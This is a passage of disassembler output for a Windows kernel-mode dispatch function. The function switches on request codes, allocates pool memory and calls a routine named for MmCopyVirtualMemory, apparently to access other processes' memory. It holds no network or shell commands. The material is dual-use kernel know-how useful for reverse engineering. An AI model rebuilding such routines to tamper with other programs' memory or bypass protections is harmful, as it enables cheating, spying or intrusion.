 86 | PAGE:FFFFF800188CD167                 jmp     loc_FFFFF800188CD61B
 87 | PAGE:FFFFF800188CD16C ; ---------------------------------------------------------------------------
 88 | PAGE:FFFFF800188CD16C
 89 | PAGE:FFFFF800188CD16C loc_FFFFF800188CD16C:                   ; CODE XREF: sub_FFFFF800188CD000+FF↑j
 90 | PAGE:FFFFF800188CD16C                 mov     rax, [rsp+30h]
 91 | PAGE:FFFFF800188CD171                 mov     ecx, [rax]
 92 | PAGE:FFFFF800188CD173                 call    sub_FFFFF800188C36A8
 93 | PAGE:FFFFF800188CD178                 and     dword ptr [rbp+1D0h+arg_20], 0
 94 | PAGE:FFFFF800188CD17F
 95 | PAGE:FFFFF800188CD17F loc_FFFFF800188CD17F:                   ; CODE XREF: sub_FFFFF800188CD000+1D7↓j
 96 | PAGE:FFFFF800188CD17F                 movups  xmm0, cs:xmmword_FFFFF800188CA0E8
 97 | PAGE:FFFFF800188CD186                 lea     rax, [rsp+20h+arg_40]
 98 | PAGE:FFFFF800188CD18B                 mov     edx, 4
 99 | PAGE:FFFFF800188CD190                 movups  xmm1, cs:xmmword_FFFFF800188CA0F8
100 | PAGE:FFFFF800188CD197                 lea     rcx, [rbp+1D0h+arg_20]
101 | PAGE:FFFFF800188CD19E                 movaps  [rsp+20h+arg_40], xmm0
102 | PAGE:FFFFF800188CD1A3                 movsd   xmm0, cs:qword_FFFFF800188CA108
103 | PAGE:FFFFF800188CD1AB                 movsd   [rbp+1D0h+var_240], xmm0
104 | PAGE:FFFFF800188CD1B0                 movaps  [rbp+1D0h+var_250], xmm1
105 | PAGE:FFFFF800188CD1B4                 jmp     loc_FFFFF800188CD61B
106 | PAGE:FFFFF800188CD1B9 ; ---------------------------------------------------------------------------
107 | PAGE:FFFFF800188CD1B9
108 | PAGE:FFFFF800188CD1B9 loc_FFFFF800188CD1B9:                   ; CODE XREF: sub_FFFFF800188CD000+F3↑j
109 | PAGE:FFFFF800188CD1B9                 mov     rax, [rsp+30h]
110 | PAGE:FFFFF800188CD1BE                 mov     ecx, [rax]
111 | PAGE:FFFFF800188CD1C0                 call    sub_FFFFF800188C696C
112 | PAGE:FFFFF800188CD1C5                 call    sub_FFFFF800188C6994
113 | PAGE:FFFFF800188CD1CA                 xor     ecx, ecx
114 | PAGE:FFFFF800188CD1CC                 cmp     al, 1
115 | PAGE:FFFFF800188CD1CE                 setz    cl
116 | PAGE:FFFFF800188CD1D1                 mov     dword ptr [rbp+1D0h+arg_20], ecx
117 | PAGE:FFFFF800188CD1D7                 jmp     short loc_FFFFF800188CD17F
118 | PAGE:FFFFF800188CD1D9 ; ---------------------------------------------------------------------------
119 | PAGE:FFFFF800188CD1D9
120 | PAGE:FFFFF800188CD1D9 loc_FFFFF800188CD1D9:                   ; CODE XREF: sub_FFFFF800188CD000+E7↑j
121 | PAGE:FFFFF800188CD1D9                 mov     ebx, 20h ; ' '
122 | PAGE:FFFFF800188CD1DE                 lea     rcx, [rsp+20h+arg_40]
123 | PAGE:FFFFF800188CD1E3                 mov     r8d, ebx
124 | PAGE:FFFFF800188CD1E6                 xor     edx, edx
125 | PAGE:FFFFF800188CD1E8                 call    sub_FFFFF800188C7900
126 | PAGE:FFFFF800188CD1ED                 mov     rcx, [rsp+30h]
127 | PAGE:FFFFF800188CD1F2                 lea     rdx, [rsp+20h+arg_40]
128 | PAGE:FFFFF800188CD1F7                 call    sub_FFFFF800188C4310
129 | PAGE:FFFFF800188CD1FC                 test    eax, eax
130 | PAGE:FFFFF800188CD1FE                 jnz     loc_FFFFF800188CD62B
131 | PAGE:FFFFF800188CD204                 jmp     loc_FFFFF800188CD5E9
132 | PAGE:FFFFF800188CD209 ; ---------------------------------------------------------------------------
133 | PAGE:FFFFF800188CD209
134 | PAGE:FFFFF800188CD209 loc_FFFFF800188CD209:                   ; CODE XREF: sub_FFFFF800188CD000+DB↑j
135 | PAGE:FFFFF800188CD209                 mov     rax, [rsp+30h]
136 | PAGE:FFFFF800188CD20E                 mov     ecx, [rax]
137 | PAGE:FFFFF800188CD210                 call    sub_FFFFF800188C48FC
138 | PAGE:FFFFF800188CD215                 and     dword ptr [rbp+1D0h+arg_20], 0
139 | PAGE:FFFFF800188CD21C
140 | PAGE:FFFFF800188CD21C loc_FFFFF800188CD21C:                   ; CODE XREF: sub_FFFFF800188CD000+2EF↓j
141 | PAGE:FFFFF800188CD21C                                         ; sub_FFFFF800188CD000+2FE↓j ...
142 | PAGE:FFFFF800188CD21C                 mov     edx, 4
143 | PAGE:FFFFF800188CD221                 lea     rcx, [rbp+1D0h+arg_20]
144 | PAGE:FFFFF800188CD228                 jmp     loc_FFFFF800188CD5F0
145 | PAGE:FFFFF800188CD22D ; ---------------------------------------------------------------------------
146 | PAGE:FFFFF800188CD22D
147 | PAGE:FFFFF800188CD22D loc_FFFFF800188CD22D:                   ; CODE XREF: sub_FFFFF800188CD000+CF↑j
148 | PAGE:FFFFF800188CD22D                 mov     rax, [rsp+30h]
149 | PAGE:FFFFF800188CD232                 xor     ecx, ecx        ; PoolType
150 | PAGE:FFFFF800188CD234                 mov     edi, [rax+4]
151 | PAGE:FFFFF800188CD237                 mov     ebx, [rax]
152 | PAGE:FFFFF800188CD239                 imul    rdx, rdi, 318h
153 | PAGE:FFFFF800188CD240                 add     rdx, 4          ; NumberOfBytes
154 | PAGE:FFFFF800188CD244                 call    cs:ExAllocatePool
155 | PAGE:FFFFF800188CD24A                 mov     r8d, edi
156 | PAGE:FFFFF800188CD24D                 mov     ecx, ebx
157 | PAGE:FFFFF800188CD24F                 mov     rsi, rax
158 | PAGE:FFFFF800188CD252                 lea     rdx, [rax+4]
159 | PAGE:FFFFF800188CD256                 call    sub_FFFFF800188C274C
160 | PAGE:FFFFF800188CD25B                 mov     [rsi], eax
161 | PAGE:FFFFF800188CD25D                 cmp     eax, edi
162 | PAGE:FFFFF800188CD25F                 movups  xmm0, cs:xmmword_FFFFF800188CA0E8
163 | PAGE:FFFFF800188CD266                 cmova   eax, edi
164 | PAGE:FFFFF800188CD269                 mov     r9, r15
165 | PAGE:FFFFF800188CD26C                 movups  xmm1, cs:xmmword_FFFFF800188CA0F8
166 | PAGE:FFFFF800188CD273                 mov     r8, r14
167 | PAGE:FFFFF800188CD276                 mov     rcx, rsi
168 | PAGE:FFFFF800188CD279                 imul    edx, eax, 318h
169 | PAGE:FFFFF800188CD27F                 lea     rax, [rsp+20h+arg_10]
170 | PAGE:FFFFF800188CD284                 movaps  [rsp+20h+arg_10], xmm0
171 | PAGE:FFFFF800188CD289                 movsd   xmm0, cs:qword_FFFFF800188CA108
172 | PAGE:FFFFF800188CD291                 movaps  xmmword ptr [rsp+20h+arg_20], xmm1
173 | PAGE:FFFFF800188CD296                 movsd   [rsp+20h+arg_30], xmm0
174 | PAGE:FFFFF800188CD29C                 add     edx, 4
175 | PAGE:FFFFF800188CD29F                 mov     [rsp+20h+var_s0], rax
176 | PAGE:FFFFF800188CD2A4                 call    sub_FFFFF800188C2270
177 | PAGE:FFFFF800188CD2A9                 mov     rcx, rsi        ; P
178 | PAGE:FFFFF800188CD2AC
179 | PAGE:FFFFF800188CD2AC loc_FFFFF800188CD2AC:                   ; CODE XREF: sub_FFFFF800188CD000+574↓j
180 | PAGE:FFFFF800188CD2AC                 xor     edx, edx        ; Tag
181 | PAGE:FFFFF800188CD2AE                 call    cs:ExFreePoolWithTag
182 | PAGE:FFFFF800188CD2B4                 jmp     loc_FFFFF800188CD62B
183 | PAGE:FFFFF800188CD2B9 ; ---------------------------------------------------------------------------
184 | PAGE:FFFFF800188CD2B9
185 | PAGE:FFFFF800188CD2B9 loc_FFFFF800188CD2B9:                   ; CODE XREF: sub_FFFFF800188CD000+C9↑j
186 | PAGE:FFFFF800188CD2B9                 cmp     ebx, 81064000h
187 | PAGE:FFFFF800188CD2BF                 jz      short loc_FFFFF800188CD320
188 | PAGE:FFFFF800188CD2C1                 cmp     ebx, 81074000h
189 | PAGE:FFFFF800188CD2C7                 jz      short loc_FFFFF800188CD303
190 | PAGE:FFFFF800188CD2C9                 cmp     ebx, 81084000h
191 | PAGE:FFFFF800188CD2CF                 jz      short loc_FFFFF800188CD2F4
192 | PAGE:FFFFF800188CD2D1                 cmp     ebx, 81094000h
193 | PAGE:FFFFF800188CD2D7                 jnz     loc_FFFFF800188CD62B
194 | PAGE:FFFFF800188CD2DD                 mov     rax, [rsp+30h]
195 | PAGE:FFFFF800188CD2E2                 mov     ecx, [rax]
196 | PAGE:FFFFF800188CD2E4                 call    sub_FFFFF800188C35B0
197 | PAGE:FFFFF800188CD2E9
198 | PAGE:FFFFF800188CD2E9 loc_FFFFF800188CD2E9:                   ; CODE XREF: sub_FFFFF800188CD000+32C↓j
199 | PAGE:FFFFF800188CD2E9                                         ; sub_FFFFF800188CD000+59C↓j
200 | PAGE:FFFFF800188CD2E9                 mov     dword ptr [rbp+1D0h+arg_20], eax
201 | PAGE:FFFFF800188CD2EF                 jmp     loc_FFFFF800188CD21C
202 | PAGE:FFFFF800188CD2F4 ; ---------------------------------------------------------------------------
203 | PAGE:FFFFF800188CD2F4
204 | PAGE:FFFFF800188CD2F4 loc_FFFFF800188CD2F4:                   ; CODE XREF: sub_FFFFF800188CD000+2CF↑j
205 | PAGE:FFFFF800188CD2F4                 mov     dword ptr [rbp+1D0h+arg_20], 133ECF0h
206 | PAGE:FFFFF800188CD2FE                 jmp     loc_FFFFF800188CD21C
207 | PAGE:FFFFF800188CD303 ; ---------------------------------------------------------------------------
208 | PAGE:FFFFF800188CD303
209 | PAGE:FFFFF800188CD303 loc_FFFFF800188CD303:                   ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
210 | PAGE:FFFFF800188CD303                 and     dword ptr [rbp+1D0h+arg_20], 0
211 | PAGE:FFFFF800188CD30A                 lea     rdx, [rbp+1D0h+arg_20]
212 | PAGE:FFFFF800188CD311                 mov     rcx, [rsp+30h]
213 | PAGE:FFFFF800188CD316                 call    FFFFF800188C4214_WrapWrapMmCopyVirtualMemoryWrap
214 | PAGE:FFFFF800188CD31B                 jmp     loc_FFFFF800188CD21C
215 | PAGE:FFFFF800188CD320 ; ---------------------------------------------------------------------------
216 | PAGE:FFFFF800188CD320
217 | PAGE:FFFFF800188CD320 loc_FFFFF800188CD320:                   ; CODE XREF: sub_FFFFF800188CD000+2BF↑j
218 | PAGE:FFFFF800188CD320                 mov     rax, [rsp+30h]
219 | PAGE:FFFFF800188CD325                 mov     ecx, [rax]
220 | PAGE:FFFFF800188CD327                 call    sub_FFFFF800188C3614
221 | PAGE:FFFFF800188CD32C                 jmp     short loc_FFFFF800188CD2E9
222 | PAGE:FFFFF800188CD32E ; ---------------------------------------------------------------------------
223 | PAGE:FFFFF800188CD32E
224 | PAGE:FFFFF800188CD32E loc_FFFFF800188CD32E:                   ; CODE XREF: sub_FFFFF800188CD000+BC↑j
225 | PAGE:FFFFF800188CD32E                 mov     rax, [rsp+30h]
226 | PAGE:FFFFF800188CD333                 mov     ecx, [rax]
227 | PAGE:FFFFF800188CD335                 call    sub_FFFFF800188C6834
228 | PAGE:FFFFF800188CD33A
229 | PAGE:FFFFF800188CD33A loc_FFFFF800188CD33A:                   ; CODE XREF: sub_FFFFF800188CD000+484↓j
230 | PAGE:FFFFF800188CD33A                 mov     [rbp+1D0h+arg_20], rax
231 | PAGE:FFFFF800188CD341                 lea     rcx, [rbp+1D0h+arg_20]
232 | PAGE:FFFFF800188CD348                 mov     edx, 8
233 | PAGE:FFFFF800188CD34D                 jmp     loc_FFFFF800188CD5F0
234 | PAGE:FFFFF800188CD352 ; ---------------------------------------------------------------------------
235 | PAGE:FFFFF800188CD352
236 | PAGE:FFFFF800188CD352 loc_FFFFF800188CD352:                   ; CODE XREF: sub_FFFFF800188CD000+B6↑j
237 | PAGE:FFFFF800188CD352                 mov     eax, 82044000h
238 | PAGE:FFFFF800188CD357                 cmp     ebx, eax
239 | PAGE:FFFFF800188CD359                 ja      loc_FFFFF800188CD4B1
240 | PAGE:FFFFF800188CD35F                 jz      loc_FFFFF800188CD489
241 | PAGE:FFFFF800188CD365                 cmp     ebx, 81114000h
242 | PAGE:FFFFF800188CD36B                 jz      loc_FFFFF800188CD478
243 | PAGE:FFFFF800188CD371                 cmp     ebx, 81124000h
244 | PAGE:FFFFF800188CD377                 jz      loc_FFFFF800188CD407
245 | PAGE:FFFFF800188CD37D                 cmp     ebx, 82004000h
246 | PAGE:FFFFF800188CD383                 jz      short loc_FFFFF800188CD3E6
247 | PAGE:FFFFF800188CD385                 cmp     ebx, 82014000h
248 | PAGE:FFFFF800188CD38B                 jz      short loc_FFFFF800188CD3C1
249 | PAGE:FFFFF800188CD38D                 cmp     ebx, 82024000h
250 | PAGE:FFFFF800188CD393                 jnz     loc_FFFFF800188CD62B
251 | PAGE:FFFFF800188CD399                 mov     ebx, 20h ; ' '
252 | PAGE:FFFFF800188CD39E                 lea     rcx, [rsp+20h+arg_40]
253 | PAGE:FFFFF800188CD3A3                 mov     r8d, ebx
254 | PAGE:FFFFF800188CD3A6                 xor     edx, edx
255 | PAGE:FFFFF800188CD3A8                 call    sub_FFFFF800188C7900
256 | PAGE:FFFFF800188CD3AD                 mov     rcx, [rsp+30h]
257 | PAGE:FFFFF800188CD3B2                 lea     rdx, [rsp+20h+arg_40]
258 | PAGE:FFFFF800188CD3B7                 call    sub_FFFFF800188C5F1C
259 | PAGE:FFFFF800188CD3BC                 jmp     loc_FFFFF800188CD5E9
260 | PAGE:FFFFF800188CD3C1 ; ---------------------------------------------------------------------------
261 | PAGE:FFFFF800188CD3C1
262 | PAGE:FFFFF800188CD3C1 loc_FFFFF800188CD3C1:                   ; CODE XREF: sub_FFFFF800188CD000+38B↑j
263 | PAGE:FFFFF800188CD3C1                 mov     ebx, 20h ; ' '
264 | PAGE:FFFFF800188CD3C6                 lea     rcx, [rsp+20h+arg_40]
265 | PAGE:FFFFF800188CD3CB                 mov     r8d, ebx
266 | PAGE:FFFFF800188CD3CE                 xor     edx, edx
267 | PAGE:FFFFF800188CD3D0                 call    sub_FFFFF800188C7900
268 | PAGE:FFFFF800188CD3D5                 lea     rdx, [rsp+20h+arg_40]
269 | PAGE:FFFFF800188CD3DA                 xor     ecx, ecx
270 | PAGE:FFFFF800188CD3DC                 call    sub_FFFFF800188C5FA0
271 | PAGE:FFFFF800188CD3E1                 jmp     loc_FFFFF800188CD5E9
272 | PAGE:FFFFF800188CD3E6 ; ---------------------------------------------------------------------------
273 | PAGE:FFFFF800188CD3E6
274 | PAGE:FFFFF800188CD3E6 loc_FFFFF800188CD3E6:                   ; CODE XREF: sub_FFFFF800188CD000+383↑j
275 | PAGE:FFFFF800188CD3E6                 mov     rcx, [rsp+30h]
276 | PAGE:FFFFF800188CD3EB                 and     dword ptr [rbp+1D0h+arg_20], 0
277 | PAGE:FFFFF800188CD3F2                 mov     r8, [rcx]
278 | PAGE:FFFFF800188CD3F5                 mov     rdx, [rcx+8]
279 | PAGE:FFFFF800188CD3F9                 mov     rcx, [rcx+10h]
280 | PAGE:FFFFF800188CD3FD                 call    sub_FFFFF800188C6408
281 | PAGE:FFFFF800188CD402                 jmp     loc_FFFFF800188CD21C
282 | PAGE:FFFFF800188CD407 ; ---------------------------------------------------------------------------
283 | PAGE:FFFFF800188CD407
284 | PAGE:FFFFF800188CD407 loc_FFFFF800188CD407:                   ; CODE XREF: sub_FFFFF800188CD000+377↑j
285 | PAGE:FFFFF800188CD407                 lea     rcx, qword_FFFFF800188CDB10
286 | PAGE:FFFFF800188CD40E                 jmp     loc_FFFFF800189F2672
287 | PAGE:FFFFF800188CD40E ; ---------------------------------------------------------------------------
288 | PAGE:FFFFF800188CD413                 db 60h dup(0CCh)
289 | PAGE:FFFFF800188CD473 ; ---------------------------------------------------------------------------
290 | PAGE:FFFFF800188CD473                 jmp     loc_FFFFF800188CD62B
291 | PAGE:FFFFF800188CD478 ; ---------------------------------------------------------------------------
292 | PAGE:FFFFF800188CD478
293 | PAGE:FFFFF800188CD478 loc_FFFFF800188CD478:                   ; CODE XREF: sub_FFFFF800188CD000+36B↑j
294 | PAGE:FFFFF800188CD478                 mov     rax, [rsp+30h]
295 | PAGE:FFFFF800188CD47D                 mov     ecx, [rax]
296 | PAGE:FFFFF800188CD47F                 call    sub_FFFFF800188C3D44
297 | PAGE:FFFFF800188CD484                 jmp     loc_FFFFF800188CD33A
298 | PAGE:FFFFF800188CD489 ; ---------------------------------------------------------------------------
299 | PAGE:FFFFF800188CD489
300 | PAGE:FFFFF800188CD489 loc_FFFFF800188CD489:                   ; CODE XREF: sub_FFFFF800188CD000+35F↑j
301 | PAGE:FFFFF800188CD489                 mov     ebx, 20h ; ' '
302 | PAGE:FFFFF800188CD48E                 lea     rcx, [rsp+20h+arg_40]
303 | PAGE:FFFFF800188CD493                 mov     r8d, ebx
304 | PAGE:FFFFF800188CD496                 xor     edx, edx
305 | PAGE:FFFFF800188CD498                 call    sub_FFFFF800188C7900
306 | PAGE:FFFFF800188CD49D                 mov     rcx, [rsp+30h]
307 | PAGE:FFFFF800188CD4A2                 lea     rdx, [rsp+20h+arg_40]
308 | PAGE:FFFFF800188CD4A7                 call    sub_FFFFF800188C6268
309 | PAGE:FFFFF800188CD4AC                 jmp     loc_FFFFF800188CD5E9
310 | PAGE:FFFFF800188CD4B1 ; ---------------------------------------------------------------------------
311 | PAGE:FFFFF800188CD4B1
312 | PAGE:FFFFF800188CD4B1 loc_FFFFF800188CD4B1:                   ; CODE XREF: sub_FFFFF800188CD000+359↑j
313 | PAGE:FFFFF800188CD4B1                 cmp     ebx, 82054000h
314 | PAGE:FFFFF800188CD4B7                 jz      loc_FFFFF800188CD5C6
315 | PAGE:FFFFF800188CD4BD                 cmp     ebx, 82064000h
316 | PAGE:FFFFF800188CD4C3                 jz      loc_FFFFF800188CD5A1
317 | PAGE:FFFFF800188CD4C9                 cmp     ebx, 82114000h
318 | PAGE:FFFFF800188CD4CF                 jz      loc_FFFFF800188CD579
319 | PAGE:FFFFF800188CD4D5                 cmp     ebx, 83014000h
320 | PAGE:FFFFF800188CD4DB                 jnz     loc_FFFFF800188CD62B
321 | PAGE:FFFFF800188CD4E1                 mov     rbx, [rsp+30h]
322 | PAGE:FFFFF800188CD4E6                 cmp     dword ptr [rbx], 88h
323 | PAGE:FFFFF800188CD4EC                 jnz     loc_FFFFF800188CD62B
324 | PAGE:FFFFF800188CD4F2                 mov     eax, [rbx+4]
325 | PAGE:FFFFF800188CD4F5                 xor     ecx, ecx        ; PoolType
326 | PAGE:FFFFF800188CD4F7                 imul    rdx, rax, 2A8h
327 | PAGE:FFFFF800188CD4FE                 add     rdx, 4          ; NumberOfBytes
328 | PAGE:FFFFF800188CD502                 call    cs:ExAllocatePool
329 | PAGE:FFFFF800188CD508                 mov     rdi, rax
330 | PAGE:FFFFF800188CD50B                 test    rax, rax
331 | PAGE:FFFFF800188CD50E                 jz      loc_FFFFF800188CD62B
332 | PAGE:FFFFF800188CD514                 lea     rcx, [rax+4]
333 | PAGE:FFFFF800188CD518                 mov     rdx, rbx
334 | PAGE:FFFFF800188CD51B                 call    sub_FFFFF800188C6038
335 | PAGE:FFFFF800188CD520                 mov     [rdi], eax
336 | PAGE:FFFFF800188CD522                 mov     r9, r15
337 | PAGE:FFFFF800188CD525                 mov     ecx, [rbx+4]
338 | PAGE:FFFFF800188CD528                 mov     r8, r14
339 | PAGE:FFFFF800188CD52B                 movups  xmm0, cs:xmmword_FFFFF800188CA0E8
340 | PAGE:FFFFF800188CD532                 cmp     eax, ecx
341 | PAGE:FFFFF800188CD534                 movups  xmm1, cs:xmmword_FFFFF800188CA0F8
342 | PAGE:FFFFF800188CD53B                 cmova   eax, ecx
343 | PAGE:FFFFF800188CD53E                 mov     rcx, rdi
344 | PAGE:FFFFF800188CD541                 movaps  [rsp+20h+arg_10], xmm0
345 | PAGE:FFFFF800188CD546                 movsd   xmm0, cs:qword_FFFFF800188CA108
346 | PAGE:FFFFF800188CD54E                 imul    edx, eax, 2A8h
347 | PAGE:FFFFF800188CD554                 lea     rax, [rsp+20h+arg_10]
348 | PAGE:FFFFF800188CD559                 movaps  xmmword ptr [rsp+20h+arg_20], xmm1
349 | PAGE:FFFFF800188CD55E                 movsd   [rsp+20h+arg_30], xmm0
350 | PAGE:FFFFF800188CD564                 mov     [rsp+20h+var_s0], rax
351 | PAGE:FFFFF800188CD569                 add     edx, 4
352 | PAGE:FFFFF800188CD56C                 call    sub_FFFFF800188C2270
353 | PAGE:FFFFF800188CD571                 mov     rcx, rdi
354 | PAGE:FFFFF800188CD574                 jmp     loc_FFFFF800188CD2AC
355 | PAGE:FFFFF800188CD579 ; ---------------------------------------------------------------------------
356 | PAGE:FFFFF800188CD579
357 | PAGE:FFFFF800188CD579 loc_FFFFF800188CD579:                   ; CODE XREF: sub_FFFFF800188CD000+4CF↑j
358 | PAGE:FFFFF800188CD579                 mov     rax, [rsp+30h]
359 | PAGE:FFFFF800188CD57E                 mov     edx, cs:dword_FFFFF800188CA688
360 | PAGE:FFFFF800188CD584                 mov     ecx, [rax]
361 | PAGE:FFFFF800188CD586                 xor     ecx, 0BAEBAEECh
362 | PAGE:FFFFF800188CD58C                 cmp     ecx, edx
363 | PAGE:FFFFF800188CD58E                 jnz     loc_FFFFF800188CD62B
364 | PAGE:FFFFF800188CD594                 mov     eax, cs:dword_FFFFF800188CA6EC
365 | PAGE:FFFFF800188CD59A                 xor     eax, edx
366 | PAGE:FFFFF800188CD59C                 jmp     loc_FFFFF800188CD2E9
367 | PAGE:FFFFF800188CD5A1 ; ---------------------------------------------------------------------------
368 | PAGE:FFFFF800188CD5A1
369 | PAGE:FFFFF800188CD5A1 loc_FFFFF800188CD5A1:                   ; CODE XREF: sub_FFFFF800188CD000+4C3↑j
370 | PAGE:FFFFF800188CD5A1                 mov     ebx, 20h ; ' '
371 | PAGE:FFFFF800188CD5A6                 lea     rcx, [rsp+20h+arg_40]
372 | PAGE:FFFFF800188CD5AB                 mov     r8d, ebx
373 | PAGE:FFFFF800188CD5AE                 xor     edx, edx
374 | PAGE:FFFFF800188CD5B0                 call    sub_FFFFF800188C7900
375 | PAGE:FFFFF800188CD5B5                 mov     rcx, [rsp+30h]
376 | PAGE:FFFFF800188CD5BA                 lea     rdx, [rsp+20h+arg_40]
377 | PAGE:FFFFF800188CD5BF                 call    sub_FFFFF800188C630C
378 | PAGE:FFFFF800188CD5C4                 jmp     short loc_FFFFF800188CD5E9
379 | PAGE:FFFFF800188CD5C6 ; ---------------------------------------------------------------------------
380 | PAGE:FFFFF800188CD5C6
381 | PAGE:FFFFF800188CD5C6 loc_FFFFF800188CD5C6:                   ; CODE XREF: sub_FFFFF800188CD000+4B7↑j
382 | PAGE:FFFFF800188CD5C6                 mov     ebx, 20h ; ' '
383 | PAGE:FFFFF800188CD5CB                 lea     rcx, [rsp+20h+arg_40]
384 | PAGE:FFFFF800188CD5D0                 mov     r8d, ebx
385 | PAGE:FFFFF800188CD5D3                 xor     edx, edx
386 | PAGE:FFFFF800188CD5D5                 call    sub_FFFFF800188C7900
387 | PAGE:FFFFF800188CD5DA                 mov     rcx, [rsp+30h]
388 | PAGE:FFFFF800188CD5DF                 lea     rdx, [rsp+20h+arg_40]
389 | PAGE:FFFFF800188CD5E4                 call    sub_FFFFF800188C61BC
390 | PAGE:FFFFF800188CD5E9
391 | PAGE:FFFFF800188CD5E9 loc_FFFFF800188CD5E9:                   ; CODE XREF: sub_FFFFF800188CD000+204↑j
392 | PAGE:FFFFF800188CD5E9                                         ; sub_FFFFF800188CD000+3BC↑j ...
393 | PAGE:FFFFF800188CD5E9                 lea     rcx, [rsp+20h+arg_40]
394 | PAGE:FFFFF800188CD5EE                 mov     edx, ebx
395 | PAGE:FFFFF800188CD5F0
396 | PAGE:FFFFF800188CD5F0 loc_FFFFF800188CD5F0:                   ; CODE XREF: sub_FFFFF800188CD000+228↑j
397 | PAGE:FFFFF800188CD5F0                                         ; sub_FFFFF800188CD000+34D↑j
398 | PAGE:FFFFF800188CD5F0                 movups  xmm0, cs:xmmword_FFFFF800188CA0E8
399 | PAGE:FFFFF800188CD5F7                 lea     rax, [rsp+20h+arg_10]
400 | PAGE:FFFFF800188CD5FC                 movups  xmm1, cs:xmmword_FFFFF800188CA0F8
401 | PAGE:FFFFF800188CD603                 movaps  [rsp+20h+arg_10], xmm0
402 | PAGE:FFFFF800188CD608                 movsd   xmm0, cs:qword_FFFFF800188CA108
403 | PAGE:FFFFF800188CD610                 movsd   [rsp+20h+arg_30], xmm0
404 | PAGE:FFFFF800188CD616                 movaps  xmmword ptr [rsp+20h+arg_20], xmm1
405 | PAGE:FFFFF800188CD61B
406 | PAGE:FFFFF800188CD61B loc_FFFFF800188CD61B:                   ; CODE XREF: sub_FFFFF800188CD000+167↑j
407 | PAGE:FFFFF800188CD61B                                         ; sub_FFFFF800188CD000+1B4↑j
408 | PAGE:FFFFF800188CD61B                 mov     r9, r15
409 | PAGE:FFFFF800188CD61E                 mov     [rsp+20h+var_s0], rax
410 | PAGE:FFFFF800188CD623                 mov     r8, r14
411 | PAGE:FFFFF800188CD626                 call    sub_FFFFF800188C2270
412 | PAGE:FFFFF800188CD62B
413 | PAGE:FFFFF800188CD62B loc_FFFFF800188CD62B:                   ; CODE XREF: sub_FFFFF800188CD000+107↑j
414 | PAGE:FFFFF800188CD62B                                         ; sub_FFFFF800188CD000+1FE↑j ...
415 | PAGE:FFFFF800188CD62B                 mov     rbx, [rsp+30h]
416 | PAGE:FFFFF800188CD630                 test    rbx, rbx
417 | PAGE:FFFFF800188CD633                 jz      short loc_FFFFF800188CD640
418 | PAGE:FFFFF800188CD635                 xor     edx, edx        ; Tag
419 | PAGE:FFFFF800188CD637                 mov     rcx, rbx        ; P
420 | PAGE:FFFFF800188CD63A                 call    cs:ExFreePoolWithTag
421 | PAGE:FFFFF800188CD640
422 | PAGE:FFFFF800188CD640 loc_FFFFF800188CD640:                   ; CODE XREF: sub_FFFFF800188CD000+633↑j
423 | PAGE:FFFFF800188CD640                 mov     al, 1
424 | PAGE:FFFFF800188CD642
425 | PAGE:FFFFF800188CD642 loc_FFFFF800188CD642:                   ; CODE XREF: sub_FFFFF800188CD000+AA↑j
426 | PAGE:FFFFF800188CD642                 lea     r11, [rsp+20h+arg_280]
427 | PAGE:FFFFF800188CD64A                 mov     rbx, [r11+30h]
428 | PAGE:FFFFF800188CD64E                 mov     rsi, [r11+38h]
429 | PAGE:FFFFF800188CD652                 mov     rsp, r11
430 | PAGE:FFFFF800188CD655                 pop     r15
431 | PAGE:FFFFF800188CD657                 pop     r14
432 | PAGE:FFFFF800188CD659                 pop     r12
433 | PAGE:FFFFF800188CD65B                 pop     rdi
434 | PAGE:FFFFF800188CD65C                 pop     rbp
435 | PAGE:FFFFF800188CD65D                 retn
436 | PAGE:FFFFF800188CD65D sub_FFFFF800188CD000 endp


--------------------------------------------------------------------------------